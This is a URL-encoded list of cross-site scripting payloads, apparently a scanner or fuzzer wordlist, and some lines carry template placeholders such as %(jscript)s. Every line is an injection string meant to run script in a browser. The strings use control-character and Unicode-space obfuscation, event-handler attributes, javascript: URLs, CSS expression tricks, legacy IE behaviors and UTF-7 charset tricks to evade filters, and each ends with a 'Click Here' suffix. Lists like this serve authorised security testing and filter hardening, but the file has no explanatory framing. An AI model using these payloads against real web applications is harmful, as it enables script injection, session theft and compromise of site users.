%3ca%20href%3d%22%5cxE2%5cx80%5cx86javascript%3ajavascript%3aalert(1)%22%20id%3d%22fuzzelement1%22%3etest%3c%2fa%3eClick Here

%3ca%20href%3d%22%5cx12javascript%3ajavascript%3aalert(1)%22%20id%3d%22fuzzelement1%22%3etest%3c%2fa%3eClick Here

%3ca%20href%3d%22%5cxE3%5cx80%5cx80javascript%3ajavascript%3aalert(1)%22%20id%3d%22fuzzelement1%22%3etest%3c%2fa%3eClick Here

%3ca%20href%3d%22%5cx0Djavascript%3ajavascript%3aalert(1)%22%20id%3d%22fuzzelement1%22%3etest%3c%2fa%3eClick Here

%3ca%20href%3d%22%5cx0Ajavascript%3ajavascript%3aalert(1)%22%20id%3d%22fuzzelement1%22%3etest%3c%2fa%3eClick Here

%3ca%20href%3d%22%5cx0Cjavascript%3ajavascript%3aalert(1)%22%20id%3d%22fuzzelement1%22%3etest%3c%2fa%3eClick Here

%3ca%20href%3d%22%5cx15javascript%3ajavascript%3aalert(1)%22%20id%3d%22fuzzelement1%22%3etest%3c%2fa%3eClick Here

%3ca%20href%3d%22%5cx16javascript%3ajavascript%3aalert(1)%22%20id%3d%22fuzzelement1%22%3etest%3c%2fa%3eClick Here

%3ca%20href%3d%22%5cxE2%5cx80%5cxA8javascript%3ajavascript%3aalert(1)%22%20id%3d%22fuzzelement1%22%3etest%3c%2fa%3eClick Here

%3ca%20href%3d%22%5cx02javascript%3ajavascript%3aalert(1)%22%20id%3d%22fuzzelement1%22%3etest%3c%2fa%3eClick Here

%3ca%20href%3d%22%5cx06javascript%3ajavascript%3aalert(1)%22%20id%3d%22fuzzelement1%22%3etest%3c%2fa%3eClick Here

%3ca%20href%3d%22%5cxE2%5cx80%5cxA9javascript%3ajavascript%3aalert(1)%22%20id%3d%22fuzzelement1%22%3etest%3c%2fa%3eClick Here

%3ca%20href%3d%22%5cxE2%5cx80%5cx85javascript%3ajavascript%3aalert(1)%22%20id%3d%22fuzzelement1%22%3etest%3c%2fa%3eClick Here

%3ca%20href%3d%22%5cx1Bjavascript%3ajavascript%3aalert(1)%22%20id%3d%22fuzzelement1%22%3etest%3c%2fa%3eClick Here

%3ca%20href%3d%22%5cx1Ejavascript%3ajavascript%3aalert(1)%22%20id%3d%22fuzzelement1%22%3etest%3c%2fa%3eClick Here

%3ca%20href%3d%22javascript%5cx00%3ajavascript%3aalert(1)%22%20id%3d%22fuzzelement1%22%3etest%3c%2fa%3eClick Here

%3ca%20href%3d%22%5cxE2%5cx81%5cx9Fjavascript%3ajavascript%3aalert(1)%22%20id%3d%22fuzzelement1%22%3etest%3c%2fa%3eClick Here

%3ca%20href%3d%22%5cx1Cjavascript%3ajavascript%3aalert(1)%22%20id%3d%22fuzzelement1%22%3etest%3c%2fa%3eClick Here

%3ca%20href%3d%22javascript%5cx3A%3ajavascript%3aalert(1)%22%20id%3d%22fuzzelement1%22%3etest%3c%2fa%3eClick Here

%3ca%20href%3d%22javascript%5cx09%3ajavascript%3aalert(1)%22%20id%3d%22fuzzelement1%22%3etest%3c%2fa%3eClick Here

%3ca%20href%3d%22javascript%5cx0D%3ajavascript%3aalert(1)%22%20id%3d%22fuzzelement1%22%3etest%3c%2fa%3eClick Here

%60%22'%3e%3cimg%20src%3dxxx%3ax%20%5cx0Aonerror%3djavascript%3aalert(1)%3eClick Here

%3ca%20href%3d%22javascript%5cx0A%3ajavascript%3aalert(1)%22%20id%3d%22fuzzelement1%22%3etest%3c%2fa%3eClick Here

%60%22'%3e%3cimg%20src%3dxxx%3ax%20%5cx22onerror%3djavascript%3aalert(1)%3eClick Here

%60%22'%3e%3cimg%20src%3dxxx%3ax%20%5cx0Bonerror%3djavascript%3aalert(1)%3eClick Here

%60%22'%3e%3cimg%20src%3dxxx%3ax%20%5cx0Donerror%3djavascript%3aalert(1)%3eClick Here

%60%22'%3e%3cimg%20src%3dxxx%3ax%20%5cx2Fonerror%3djavascript%3aalert(1)%3eClick Here

%60%22'%3e%3cimg%20src%3dxxx%3ax%20%5cx09onerror%3djavascript%3aalert(1)%3eClick Here

%60%22'%3e%3cimg%20src%3dxxx%3ax%20%5cx0Conerror%3djavascript%3aalert(1)%3eClick Here

%60%22'%3e%3cimg%20src%3dxxx%3ax%20%5cx00onerror%3djavascript%3aalert(1)%3eClick Here

%60%22'%3e%3cimg%20src%3dxxx%3ax%20%5cx27onerror%3djavascript%3aalert(1)%3eClick Here

%60%22'%3e%3cimg%20src%3dxxx%3ax%20%5cx20onerror%3djavascript%3aalert(1)%3eClick Here

%22%60'%3e%3cscript%3e%5cx3Bjavascript%3aalert(1)%3c%2fscript%3eClick Here

%22%60'%3e%3cscript%3e%5cx0Djavascript%3aalert(1)%3c%2fscript%3eClick Here

%22%60'%3e%3cscript%3e%5cxEF%5cxBB%5cxBFjavascript%3aalert(1)%3c%2fscript%3eClick Here

%22%60'%3e%3cscript%3e%5cxE2%5cx80%5cx81javascript%3aalert(1)%3c%2fscript%3eClick Here

%22%60'%3e%3cscript%3e%5cxE2%5cx80%5cx84javascript%3aalert(1)%3c%2fscript%3eClick Here

%22%60'%3e%3cscript%3e%5cxE3%5cx80%5cx80javascript%3aalert(1)%3c%2fscript%3eClick Here

%22%60'%3e%3cscript%3e%5cxE2%5cx80%5cx89javascript%3aalert(1)%3c%2fscript%3eClick Here

%22%60'%3e%3cscript%3e%5cx09javascript%3aalert(1)%3c%2fscript%3eClick Here

%22%60'%3e%3cscript%3e%5cxE2%5cx80%5cx85javascript%3aalert(1)%3c%2fscript%3eClick Here

%22%60'%3e%3cscript%3e%5cxE2%5cx80%5cx88javascript%3aalert(1)%3c%2fscript%3eClick Here

%22%60'%3e%3cscript%3e%5cx00javascript%3aalert(1)%3c%2fscript%3eClick Here

%22%60'%3e%3cscript%3e%5cxE2%5cx80%5cxA8javascript%3aalert(1)%3c%2fscript%3eClick Here

%22%60'%3e%3cscript%3e%5cxE2%5cx80%5cx8Ajavascript%3aalert(1)%3c%2fscript%3eClick Here

%22%60'%3e%3cscript%3e%5cxE1%5cx9A%5cx80javascript%3aalert(1)%3c%2fscript%3eClick Here

%22%60'%3e%3cscript%3e%5cx0Cjavascript%3aalert(1)%3c%2fscript%3eClick Here

%22%60'%3e%3cscript%3e%5cxF0%5cx90%5cx96%5cx9Ajavascript%3aalert(1)%3c%2fscript%3eClick Here

%22%60'%3e%3cscript%3e%5cx2Bjavascript%3aalert(1)%3c%2fscript%3eClick Here

%22%60'%3e%3cscript%3e-javascript%3aalert(1)%3c%2fscript%3eClick Here

%22%60'%3e%3cscript%3e%5cx0Ajavascript%3aalert(1)%3c%2fscript%3eClick Here

%22%60'%3e%3cscript%3e%5cxE2%5cx80%5cxAFjavascript%3aalert(1)%3c%2fscript%3eClick Here

%22%60'%3e%3cscript%3e%5cx7Ejavascript%3aalert(1)%3c%2fscript%3eClick Here

%22%60'%3e%3cscript%3e%5cxE2%5cx81%5cx9Fjavascript%3aalert(1)%3c%2fscript%3eClick Here

%22%60'%3e%3cscript%3e%5cxE2%5cx80%5cx87javascript%3aalert(1)%3c%2fscript%3eClick Here

%22%60'%3e%3cscript%3e%5cxE2%5cx80%5cxA9javascript%3aalert(1)%3c%2fscript%3eClick Here

%22%60'%3e%3cscript%3e%5cxC2%5cx85javascript%3aalert(1)%3c%2fscript%3eClick Here

%22%60'%3e%3cscript%3e%5cxE2%5cx80%5cx83javascript%3aalert(1)%3c%2fscript%3eClick Here

%22%60'%3e%3cscript%3e%5cxEF%5cxBF%5cxAEjavascript%3aalert(1)%3c%2fscript%3eClick Here

%22%60'%3e%3cscript%3e%5cxEF%5cxBF%5cxBEjavascript%3aalert(1)%3c%2fscript%3eClick Here

%22%60'%3e%3cscript%3e%5cxE2%5cx80%5cx8Bjavascript%3aalert(1)%3c%2fscript%3eClick Here

%22%60'%3e%3cscript%3e%5cx21javascript%3aalert(1)%3c%2fscript%3eClick Here

%22%60'%3e%3cscript%3e%5cxE2%5cx80%5cx80javascript%3aalert(1)%3c%2fscript%3eClick Here

%22%60'%3e%3cscript%3e%5cxE2%5cx80%5cx82javascript%3aalert(1)%3c%2fscript%3eClick Here

%22%60'%3e%3cscript%3e%5cxE1%5cxA0%5cx8Ejavascript%3aalert(1)%3c%2fscript%3eClick Here

%22%60'%3e%3cscript%3e%5cxE2%5cx80%5cx86javascript%3aalert(1)%3c%2fscript%3eClick Here

%22%60'%3e%3cscript%3e%5cx20javascript%3aalert(1)%3c%2fscript%3eClick Here

%22%60'%3e%3cscript%3e%5cx0Bjavascript%3aalert(1)%3c%2fscript%3eClick Here

%22%60'%3e%3cscript%3e%5cxC2%5cxA0javascript%3aalert(1)%3c%2fscript%3eClick Here

%22%2f%3e%3cimg%2fonerror%3d%5cx0Bjavascript%3aalert(1)%5cx0Bsrc%3dxxx%3ax%20%2f%3eClick Here

%22%2f%3e%3cimg%2fonerror%3d%5cx09javascript%3aalert(1)%5cx09src%3dxxx%3ax%20%2f%3eClick Here

%22%2f%3e%3cimg%2fonerror%3d%5cx27javascript%3aalert(1)%5cx27src%3dxxx%3ax%20%2f%3eClick Here

%22%2f%3e%3cimg%2fonerror%3d%5cx22javascript%3aalert(1)%5cx22src%3dxxx%3ax%20%2f%3eClick Here

%22%2f%3e%3cimg%2fonerror%3d%5cx0Cjavascript%3aalert(1)%5cx0Csrc%3dxxx%3ax%20%2f%3eClick Here

%22%2f%3e%3cimg%2fonerror%3d%5cx0Ajavascript%3aalert(1)%5cx0Asrc%3dxxx%3ax%20%2f%3eClick Here

%22%2f%3e%3cimg%2fonerror%3d%5cx0Djavascript%3aalert(1)%5cx0Dsrc%3dxxx%3ax%20%2f%3eClick Here

%22%2f%3e%3cimg%2fonerror%3d%5cx60javascript%3aalert(1)%5cx60src%3dxxx%3ax%20%2f%3eClick Here

%22%2f%3e%3cimg%2fonerror%3d%5cx20javascript%3aalert(1)%5cx20src%3dxxx%3ax%20%2f%3eClick Here

%3cscript%5cx2F%3ejavascript%3aalert(1)%3c%2fscript%3eClick Here

%3cscript%5cx20%3ejavascript%3aalert(1)%3c%2fscript%3eClick Here

%3cscript%5cx0D%3ejavascript%3aalert(1)%3c%2fscript%3eClick Here

%3cscript%5cx0C%3ejavascript%3aalert(1)%3c%2fscript%3eClick Here

%3cscript%5cx0A%3ejavascript%3aalert(1)%3c%2fscript%3eClick Here

%3cscript%5cx00%3ejavascript%3aalert(1)%3c%2fscript%3eClick Here

%3cscript%5cx09%3ejavascript%3aalert(1)%3c%2fscript%3eClick Here

%22%3e%3cimg%20src%3dx%20onerror%3djavascript%3aalert(1)%3eClick Here

%22%3e%3cimg%20src%3dx%20onerror%3djavascript%3aalert(%221%22)%3eClick Here

%22%3e%3cimg%20src%3dx%20onerror%3djavascript%3aalert('1')%3eClick Here

%22%3e%3cimg%20src%3dx%20onerror%3djavascript%3aalert(%601%60)%3eClick Here

%22%3e%3cimg%20src%3dx%20onerror%3djavascript%3aalert(('1'))%3eClick Here

%22%3e%3cimg%20src%3dx%20onerror%3djavascript%3aalert((%221%22))%3eClick Here

%22%3e%3cimg%20src%3dx%20onerror%3djavascript%3aalert(A)%3eClick Here

%22%3e%3cimg%20src%3dx%20onerror%3djavascript%3aalert((%601%60))%3eClick Here

%22%3e%3cimg%20src%3dx%20onerror%3djavascript%3aalert(('A'))%3eClick Here

%22%3e%3cimg%20src%3dx%20onerror%3djavascript%3aalert((A))%3eClick Here

%22%3e%3cimg%20src%3dx%20onerror%3djavascript%3aalert('A')%3eClick Here

%22%3e%3cimg%20src%3dx%20onerror%3djavascript%3aalert((%22A%22))%3eClick Here

%22%3e%3cimg%20src%3dx%20onerror%3djavascript%3aalert(%22A%22)%3eClick Here

%22%3e%3cimg%20src%3dx%20onerror%3djavascript%3aalert(%60A%60)%3eClick Here

%22%3e%3cimg%20src%3dx%20onerror%3djavascript%3aalert((%60A%60))%3eClick Here

%60%22'%3e%3cimg%20src%3dxxx%3ax%20onerror%5cx0B%3djavascript%3aalert(1)%3eClick Here

%60%22'%3e%3cimg%20src%3dxxx%3ax%20onerror%5cx00%3djavascript%3aalert(1)%3eClick Here

%60%22'%3e%3cimg%20src%3dxxx%3ax%20onerror%5cx0C%3djavascript%3aalert(1)%3eClick Here

%60%22'%3e%3cimg%20src%3dxxx%3ax%20onerror%5cx0D%3djavascript%3aalert(1)%3eClick Here

%60%22'%3e%3cimg%20src%3dxxx%3ax%20onerror%5cx20%3djavascript%3aalert(1)%3eClick Here

%60%22'%3e%3cimg%20src%3dxxx%3ax%20onerror%5cx09%3djavascript%3aalert(1)%3eClick Here

%60%22'%3e%3cimg%20src%3dxxx%3ax%20onerror%5cx0A%3djavascript%3aalert(1)%3eClick Here

%3cscript%3ejavascript%3aalert(1)%3c%5cx00%2fscript%3eClick Here

%3cimg%20src%3d%23%20onerror%5cx3D%22javascript%3aalert(1)%22%20%3eClick Here

%3cinput%20onfocus%3djavascript%3aalert(1)%20autofocus%3eClick Here

%3cinput%20onblur%3djavascript%3aalert(1)%20autofocus%3e%3cinput%20autofocus%3eClick Here

%3cvideo%20poster%3djavascript%3ajavascript%3aalert(1)%2f%2fClick Here

%3cform%20id%3dtest%20onforminput%3djavascript%3aalert(1)%3e%3cinput%3e%3c%2fform%3e%3cbutton%20form%3dtest%20onformchange%3djavascript%3aalert(1)%3eXClick Here

%3cvideo%20onerror%3d%22javascript%3ajavascript%3aalert(1)%22%3e%3csource%3eClick Here

%3cvideo%3e%3csource%20onerror%3d%22javascript%3ajavascript%3aalert(1)%22%3eClick Here

%3cform%3e%3cbutton%20formaction%3d%22javascript%3ajavascript%3aalert(1)%22%3eXClick Here

%3cbody%20oninput%3djavascript%3aalert(1)%3e%3cinput%20autofocus%3eClick Here

%3c!--%3cimg%20src%3d%22--%3e%3cimg%20src%3dx%20onerror%3djavascript%3aalert(1)%2f%2f%22%3eClick Here

%3cframeset%20onload%3djavascript%3aalert(1)%3eClick Here

%3ctable%20background%3d%22javascript%3ajavascript%3aalert(1)%22%3eClick Here

%3ccomment%3e%3cimg%20src%3d%22%3c%2fcomment%3e%3cimg%20src%3dx%20onerror%3djavascript%3aalert(1))%2f%2f%22%3eClick Here

%3c![%3e%3cimg%20src%3d%22]%3e%3cimg%20src%3dx%20onerror%3djavascript%3aalert(1)%2f%2f%22%3eClick Here

%3cstyle%3e%3cimg%20src%3d%22%3c%2fstyle%3e%3cimg%20src%3dx%20onerror%3djavascript%3aalert(1)%2f%2f%22%3eClick Here

%3cli%20style%3dlist-style%3aurl()%20onerror%3djavascript%3aalert(1)%3e%20%3cdiv%20style%3dcontent%3aurl(data%3aimage%2fsvg%2bxml,%%3Csvg%2f%%3E)%3bvisibility%3ahidden%20onload%3djavascript%3aalert(1)%3e%3c%2fdiv%3eClick Here

%3chead%3e%3cbase%20href%3d%22javascript%3a%2f%2f%22%3e%3c%2fhead%3e%3cbody%3e%3ca%20href%3d%22%2f%2e%20%2f,javascript%3aalert(1)%2f%2f%23%22%3eXXX%3c%2fa%3e%3c%2fbody%3eClick Here

%3cobject%20data%3d%22data%3atext%2fhtml%3bbase64,%(base64)s%22%3eClick Here

%3cOBJECT%20CLASSID%3d%22clsid%3a333C7BC4-460F-11D0-BC04-0080C7055A83%22%3e%3cPARAM%20NAME%3d%22DataURL%22%20VALUE%3d%22javascript%3aalert(1)%22%3e%3c%2fOBJECT%3eClick Here

%3cSCRIPT%20FOR%3ddocument%20EVENT%3donreadystatechange%3ejavascript%3aalert(1)%3c%2fSCRIPT%3eClick Here

%3cb%20%3cscript%3ealert(1)%3c%2fscript%3e0Click Here

%3cembed%20src%3d%22data%3atext%2fhtml%3bbase64,%(base64)s%22%3eClick Here

%3cx%20'%3d%22foo%22%3e%3cx%20foo%3d'%3e%3cimg%20src%3dx%20onerror%3djavascript%3aalert(1)%2f%2f'%3eClick Here

%3cembed%20src%3d%22javascript%3aalert(1)%22%3eClick Here

%3cimg%20src%3d%22javascript%3aalert(1)%22%3eClick Here

%3cscript%20src%3d%22javascript%3aalert(1)%22%3eClick Here

%3cimage%20src%3d%22javascript%3aalert(1)%22%3eClick Here

%3cdiv%20style%3dwidth%3a1px%3bfilter%3aglow%20onfilterchange%3djavascript%3aalert(1)%3exClick Here

%3c%3f%20foo%3d%22%3e%3cscript%3ejavascript%3aalert(1)%3c%2fscript%3e%22%3eClick Here

%3c!%20foo%3d%22%3e%3cscript%3ejavascript%3aalert(1)%3c%2fscript%3e%22%3eClick Here

%3c%3f%20foo%3d%22%3e%3cx%20foo%3d'%3f%3e%3cscript%3ejavascript%3aalert(1)%3c%2fscript%3e'%3e%22%3eClick Here

%3c%2f%20foo%3d%22%3e%3cscript%3ejavascript%3aalert(1)%3c%2fscript%3e%22%3eClick Here

%3c!%20foo%3d%22[[[Inception]]%22%3e%3cx%20foo%3d%22]foo%3e%3cscript%3ejavascript%3aalert(1)%3c%2fscript%3e%22%3eClick Here

%3c%%20foo%3e%3cx%20foo%3d%22%%3e%3cscript%3ejavascript%3aalert(1)%3c%2fscript%3e%22%3eClick Here

%3cdiv%20id%3dd%3e%3cx%20xmlns%3d%22%3e%3ciframe%20onload%3djavascript%3aalert(1)%22%3e%3c%2fdiv%3e%20%3cscript%3ed%2einnerHTML%3dd%2einnerHTML%3c%2fscript%3eClick Here

%3cimg%20%5cx47src%3dx%20onerror%3d%22javascript%3aalert(1)%22%3eClick Here

%3cimg%20%5cx00src%3dx%20onerror%3d%22alert(1)%22%3eClick Here

%3cimg%20%5cx11src%3dx%20onerror%3d%22javascript%3aalert(1)%22%3eClick Here

%3cimg%20%5cx12src%3dx%20onerror%3d%22javascript%3aalert(1)%22%3eClick Here

%3cimg%5cx47src%3dx%20onerror%3d%22javascript%3aalert(1)%22%3eClick Here

%3cimg%5cx10src%3dx%20onerror%3d%22javascript%3aalert(1)%22%3eClick Here

%3cimg%5cx13src%3dx%20onerror%3d%22javascript%3aalert(1)%22%3eClick Here

%3cimg%5cx11src%3dx%20onerror%3d%22javascript%3aalert(1)%22%3eClick Here

%3cimg%5cx32src%3dx%20onerror%3d%22javascript%3aalert(1)%22%3eClick Here

%3cimg%5cx47src%3dx%20onerror%3d%22javascript%3aalert(1)%22%3eClick Here

%3cimg%20%5cx47src%3dx%20onerror%3d%22javascript%3aalert(1)%22%3eClick Here

%3cimg%20%5cx34src%3dx%20onerror%3d%22javascript%3aalert(1)%22%3eClick Here

%3cimg%20%5cx39src%3dx%20onerror%3d%22javascript%3aalert(1)%22%3eClick Here

%3cimg%20%5cx00src%3dx%20onerror%3d%22javascript%3aalert(1)%22%3eClick Here

%3cimg%20src%5cx10%3dx%20onerror%3d%22javascript%3aalert(1)%22%3eClick Here

%3cimg%20src%5cx09%3dx%20onerror%3d%22javascript%3aalert(1)%22%3eClick Here

%3cimg%20src%5cx13%3dx%20onerror%3d%22javascript%3aalert(1)%22%3eClick Here

%3cimg%20src%5cx12%3dx%20onerror%3d%22javascript%3aalert(1)%22%3eClick Here

%3cimg%20src%5cx11%3dx%20onerror%3d%22javascript%3aalert(1)%22%3eClick Here

%3cimg%20src%5cx00%3dx%20onerror%3d%22javascript%3aalert(1)%22%3eClick Here

%3cimg%20src%5cx32%3dx%20onerror%3d%22javascript%3aalert(1)%22%3eClick Here

%3cimg%20src%5cx47%3dx%20onerror%3d%22javascript%3aalert(1)%22%3eClick Here

%3cimg%20src%3dx%5cx09onerror%3d%22javascript%3aalert(1)%22%3eClick Here

%3cimg%20src%3dx%5cx11onerror%3d%22javascript%3aalert(1)%22%3eClick Here

%3cimg%20src%3dx%5cx10onerror%3d%22javascript%3aalert(1)%22%3eClick Here

%3cimg%20src%3dx%5cx12onerror%3d%22javascript%3aalert(1)%22%3eClick Here

%3cimg%20src%3dx%5cx13onerror%3d%22javascript%3aalert(1)%22%3eClick Here

%3cimg[a][b][c]src[d]%3dx[e]onerror%3d[f]%22alert(1)%22%3eClick Here

%3cimg%20src%3dx%20onerror%3d%5cx11%22javascript%3aalert(1)%22%3eClick Here

%3cimg%20src%3dx%20onerror%3d%5cx09%22javascript%3aalert(1)%22%3eClick Here

%3cimg%20src%3dx%20onerror%3d%5cx32%22javascript%3aalert(1)%22%3eClick Here

%3cimg%20src%3dx%20onerror%3d%5cx12%22javascript%3aalert(1)%22%3eClick Here

%3cimg%20src%3dx%20onerror%3d%5cx10%22javascript%3aalert(1)%22%3eClick Here

%3ca%20href%3djava%26%231%26%232%26%233%26%234%26%235%26%236%26%237%26%238%26%2311%26%2312script%3ajavascript%3aalert(1)%3eXXX%3c%2fa%3eClick Here

%3cimg%20src%3dx%20onerror%3d%5cx00%22javascript%3aalert(1)%22%3eClick Here

%3cimg%20src%20onerror%20%2f%22%20'%22%3d%20alt%3djavascript%3aalert(1)%2f%2f%22%3eClick Here

%3cimg%20src%3d%22x%60%20%60%3cscript%3ejavascript%3aalert(1)%3c%2fscript%3e%22%60%20%60%3eClick Here

%3ca%20href%3dhttp%3a%2f%2ffoo%2ebar%2f%23x%3d%60y%3e%3c%2fa%3e%3cimg%20alt%3d%22%60%3e%3cimg%20src%3dx%3ax%20onerror%3djavascript%3aalert(1)%3e%3c%2fa%3e%22%3eClick Here

%3ctitle%20onpropertychange%3djavascript%3aalert(1)%3e%3c%2ftitle%3e%3ctitle%20title%3d%3eClick Here

%3c!--[if]%3e%3cscript%3ejavascript%3aalert(1)%3c%2fscript%20--%3eClick Here

%3c!--[if%3cimg%20src%3dx%20onerror%3djavascript%3aalert(1)%2f%2f]%3e%20--%3eClick Here

%3cscript%20src%3d%22%5c%5c%(jscript)s%22%3e%3c%2fscript%3eClick Here

%3cscript%20src%3d%22%2f%5c%(jscript)s%22%3e%3c%2fscript%3eClick Here

%3ca%20style%3d%22-o-link%3a'javascript%3ajavascript%3aalert(1)'%3b-o-link-source%3acurrent%22%3eXClick Here

%3cstyle%3ep[foo%3dbar%7b%7d%2a%7b-o-link%3a'javascript%3ajavascript%3aalert(1)'%7d%7b%7d%2a%7b-o-link-source%3acurrent%7d]%7bcolor%3ared%7d%3b%3c%2fstyle%3eClick Here

%3clink%20rel%3dstylesheet%20href%3ddata%3a,%2a%7bx%3aexpression(javascript%3aalert(1))%7dClick Here

%3cstyle%3e@import%20%22data%3a,%2a%7bx%3aexpression(javascript%3aalert(1))%7D%22%3b%3c%2fstyle%3eClick Here

%3ca%20style%3d%22pointer-events%3anone%3bposition%3aabsolute%3b%22%3e%3ca%20style%3d%22position%3aabsolute%3b%22%20onclick%3d%22javascript%3aalert(1)%3b%22%3eXXX%3c%2fa%3e%3c%2fa%3e%3ca%20href%3d%22javascript%3ajavascript%3aalert(1)%22%3eXXX%3c%2fa%3eClick Here

%3cstyle%3e%2a[%7b%7d@import'%(css)s%3f]%3c%2fstyle%3eXClick Here

%3cdiv%20style%3d%22font-family%3a'foo%26%2310%3b%3bcolor%3ared%3b'%3b%22%3eXXXClick Here

%3cdiv%20style%3d%22font-family%3afoo%7dcolor%3dred%3b%22%3eXXXClick Here

%3c%2f%2f%20style%3dx%3aexpression%5c28javascript%3aalert(1)%5c29%3eClick Here

%3cstyle%3e%2a%7bx%3aEXPRESSION(javascript%3aalert(1))%7d%3c%2fstyle%3eClick Here

%3cdiv%20style%3dcontent%3aurl(%(svg)s)%3e%3c%2fdiv%3eClick Here

%3cdiv%20style%3d%22list-style%3aurl(http%3a%2f%2ffoo%2ef)%5c20url(javascript%3ajavascript%3aalert(1))%3b%22%3eXClick Here

%3cdiv%20id%3dd%3e%3cdiv%20style%3d%22font-family%3a'sans%5c27%5c3B%20color%5c3Ared%5c3B'%22%3eX%3c%2fdiv%3e%3c%2fdiv%3e%20%3cscript%3ewith(document%2egetElementById(%22d%22))innerHTML%3dinnerHTML%3c%2fscript%3eClick Here

%3cdiv%20style%3d%22background%3aurl(%2ff%23%26%23127%3boo%2f%3bcolor%3ared%2f%2a%2ffoo%2ejpg)%3b%22%3eXClick Here

%3cdiv%20style%3d%22font-family%3afoo%7bbar%3bbackground%3aurl(http%3a%2f%2ffoo%2ef%2foo%7d%3bcolor%3ared%2f%2a%2ffoo%2ejpg)%3b%22%3eXClick Here

%3cdiv%20id%3d%22x%22%3eXXX%3c%2fdiv%3e%20%3cstyle%3e%20%20%23x%7bfont-family%3afoo[bar%3bcolor%3agreen%3b%7d%20%20%23y]%3bcolor%3ared%3b%7b%7d%20%20%3c%2fstyle%3eClick Here

%3cx%20style%3d%22background%3aurl('x%26%231%3b%3bcolor%3ared%3b%2f%2a')%22%3eXXX%3c%2fx%3eClick Here

%3cscript%3e(%7bset%2f%2a%2a%2f$($)%7b_%2f%2a%2a%2fsetter%3d$,_%3djavascript%3aalert(1)%7d%7d)%2e$%3deval%3c%2fscript%3eClick Here

%3cscript%3e(%7b0%3a%230%3deval%2f%230%23%2f%230%23(javascript%3aalert(1))%7d)%3c%2fscript%3eClick Here

%3cscript%3eObject%2e__noSuchMethod__%20%3d%20Function,[%7b%7d][0]%2econstructor%2e_('javascript%3aalert(1)')()%3c%2fscript%3eClick Here

%3cscript%3eReferenceError%2eprototype%2e__defineGetter__('name',%20function()%7bjavascript%3aalert(1)%7d),x%3c%2fscript%3eClick Here

%3cmeta%20charset%3d%22x-imap4-modified-utf7%22%3e%26ADz%26AGn%26AG0%26AEf%26ACA%26AHM%26AHI%26AGO%26AD0%26AGn%26ACA%26AG8Abg%26AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ%26ACAAPABiClick Here

%3cmeta%20charset%3d%22x-imap4-modified-utf7%22%3e%26%3cscript%26S1%26TS%261%3ealert%26A7%26(1)%26R%26UA%3b%26%26%3c%26A9%2611%2fscript%26X%26%3eClick Here

1%3cset%2fxmlns%3d%60urn%3aschemas-microsoft-com%3atime%60%20style%3d%60beh%26%23x41vior%3aurl(%23default%23time2)%60%20attributename%3d%60innerhtml%60%20to%3d%60%26lt%3bimg%2fsrc%3d%26quot%3bx%26quot%3bonerror%3djavascript%3aalert(1)%26gt%3b%60%3eClick Here

X%3cx%20style%3d%60behavior%3aurl(%23default%23time2)%60%20onbegin%3d%60javascript%3aalert(1)%60%20%3eClick Here

1%3canimate%2fxmlns%3durn%3aschemas-microsoft-com%3atime%20style%3dbehavior%3aurl(%23default%23time2)%20attributename%3dinnerhtml%20values%3d%26lt%3bimg%2fsrc%3d%26quot%3b%2e%26quot%3bonerror%3djavascript%3aalert(1)%26gt%3b%3eClick Here

%3cvmlframe%20xmlns%3durn%3aschemas-microsoft-com%3avml%20style%3dbehavior%3aurl(%23default%23vml)%3bposition%3aabsolute%3bwidth%3a100%%3bheight%3a100%%20src%3d%(vml)s%23xss%3e%3c%2fvmlframe%3eClick Here

%3ca%20style%3d%22behavior%3aurl(%23default%23AnchorClick)%3b%22%20folder%3d%22javascript%3ajavascript%3aalert(1)%22%3eXXX%3c%2fa%3eClick Here

%3cx%20style%3d%22behavior%3aurl(%(sct)s)%22%3eClick Here

%3cxml%20id%3d%22xss%22%20src%3d%22%(htc)s%22%3e%3c%2fxml%3e%20%3clabel%20dataformatas%3d%22html%22%20datasrc%3d%22%23xss%22%20datafld%3d%22payload%22%3e%3c%2flabel%3eClick Here

%3cevent-source%20src%3d%22%(event)s%22%20onload%3d%22javascript%3aalert(1)%22%3eClick Here

%3ca%20href%3d%22javascript%3ajavascript%3aalert(1)%22%3e%3cevent-source%20src%3d%22data%3aapplication%2fx-dom-event-stream,Event%3aclick%0Adata%3aXXX%0A%0A%22%3eClick Here

%3cscript%3e%(payload)s%3c%2fscript%3eClick Here

%3cIMG%20SRC%3d%22javascript%3ajavascript%3aalert(1)%3b%22%3eClick Here

%3cscript%20language%3d'javascript'%20src%3d'%(jscript)s'%3e%3c%2fscript%3eClick Here

%3cscript%20src%3d%(jscript)s%3e%3c%2fscript%3eClick Here

%3cIMG%20SRC%3djavascript%3ajavascript%3aalert(1)%3eClick Here

%3cscript%3ejavascript%3aalert(1)%3c%2fscript%3eClick Here

%3cIMG%20SRC%3d%60javascript%3ajavascript%3aalert(1)%60%3eClick Here

%3cFRAMESET%3e%3cFRAME%20SRC%3d%22javascript%3ajavascript%3aalert(1)%3b%22%3e%3c%2fFRAMESET%3eClick Here

%3cSCRIPT%20SRC%3d%(jscript)s%3f%3cB%3eClick Here

%3cBODY%20ONLOAD%3djavascript%3aalert(1)%3eClick Here

%3cIMG%20SRC%3d%22jav%20ascript%3ajavascript%3aalert(1)%3b%22%3eClick Here

%3cBODY%20ONLOAD%3djavascript%3ajavascript%3aalert(1)%3eClick Here

%3cBODY%20onload!%23$%%%26()%2a~%2b-_%2e,%3a%3b%3f@[%2f%7c%5c]%5e%60%3djavascript%3aalert(1)%3eClick Here

%3cSCRIPT%2fSRC%3d%22%(jscript)s%22%3e%3c%2fSCRIPT%3eClick Here

%3c%3cSCRIPT%3e%(payload)s%2f%2f%3c%3c%2fSCRIPT%3eClick Here

%3cIMG%20SRC%3d%22javascript%3ajavascript%3aalert(1)%22Click Here

%3ciframe%20src%3d%(scriptlet)s%20%3cClick Here

%3cINPUT%20TYPE%3d%22IMAGE%22%20SRC%3d%22javascript%3ajavascript%3aalert(1)%3b%22%3eClick Here

%3cIMG%20LOWSRC%3d%22javascript%3ajavascript%3aalert(1)%22%3eClick Here

%3cIMG%20DYNSRC%3d%22javascript%3ajavascript%3aalert(1)%22%3eClick Here

%3cBGSOUND%20SRC%3d%22javascript%3ajavascript%3aalert(1)%3b%22%3eClick Here

%3cBR%20SIZE%3d%22%26%7bjavascript%3aalert(1)%7d%22%3eClick Here

%3cLAYER%20SRC%3d%22%(scriptlet)s%22%3e%3c%2fLAYER%3eClick Here

%3cLINK%20REL%3d%22stylesheet%22%20HREF%3d%22javascript%3ajavascript%3aalert(1)%3b%22%3eClick Here

